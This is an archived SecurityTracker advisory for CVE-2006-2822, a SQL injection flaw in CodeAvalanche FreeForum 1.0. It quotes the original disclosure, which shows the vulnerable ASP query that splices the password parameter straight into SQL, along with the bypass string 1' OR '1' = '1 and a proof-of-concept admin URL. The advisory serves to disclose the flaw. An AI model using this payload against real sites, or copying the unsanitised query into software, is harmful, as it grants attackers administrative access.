Home    |    View Topics    |    Search    |    Contact Us    |   



Category:   Application (Forum/Board/Portal)  >   CodeAvalanche FreeForum Vendors:   CodeAvalanche
CodeAvalanche FreeForum Input Validation Hole Permits SQL Injection Attacks
SecurityTracker Alert ID:  1016212
SecurityTracker URL:
CVE Reference:   CVE-2006-2822   (Links to External Site)
Updated:  May 22 2009
Original Entry Date:  Jun 2 2006
Impact:   Disclosure of system information, Disclosure of user information, User access via network
Exploit Included:  Yes  
Version(s): 1.0
Description:   A vulnerability was reported in CodeAvalanche FreeForum. A remote user can inject SQL commands.

The 'admin/default.asp' script does not properly validate user-supplied input in the 'password' parameter. A remote user can supply a specially crafted parameter value to execute SQL commands on the underlying database. This can be exploited to gain administrative access to the target application.

A demonstration exploit URL is provided:


omnipresent discovered this vulnerability.

The original advisory is available at:

Impact:   A remote user can execute SQL commands on the underlying database.
Solution:   No solution was available at the time of this entry.
Vendor URL: (Links to External Site)
Cause:   Input validation error
Underlying OS:  Windows (Any)

Message History:   None.

 Source Message Contents

Subject:  CA Forum Remote SQL Injection


               - CAForum 1.0 Remote SQL Injection -

   -= =-


	    -= CodeAvalanche Forum Version 1.0 =-


june 01, 2006



SQL Injection



CodeAvalanche Forum Version 1.0



Description of product:


CodeAvalanche FreeForum is asp forum application which allows free posting, there is no needs for registration of your

visitors. Administrator can add unlimited number of forum categories.

Vulnerability / Exploit:


In the file default.asp in Admin directory is vulnerable to an Remote SQL Injection Attack.

A malicious people can gain Admin rights by putting rights parameters in the Password Variable.

Let's Check the source code:

<% Response.Buffer = True 


If Request("Password")<>"" Then 



dim rsUser,selectSQL

selectSQL="SELECT * FROM PARAMS where PASSWORD='" & Request("Password") & "'"


[End default.asp]

As you can see the variable Password is not properly sanitized before be used, so an attacker can put this string in the

password field:

1' OR '1' = '1

So, the query will be:

selectSQL="SELECT * FROM PARAMS where PASSWORD='1' OR '1' = '1'

And you can gain access to the application with admin rights.

PoC / Proof of Concept of SQL Injection:


This is a simple Proof Of Concept used on my local machine:[Application_Path]/[CAForum]/admin/default.asp?password=1'%20OR%20'1'%20=%20'1

Vendor Status


Not informed!





Go to the Top of This SecurityTracker Archive Page

Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2022, LLC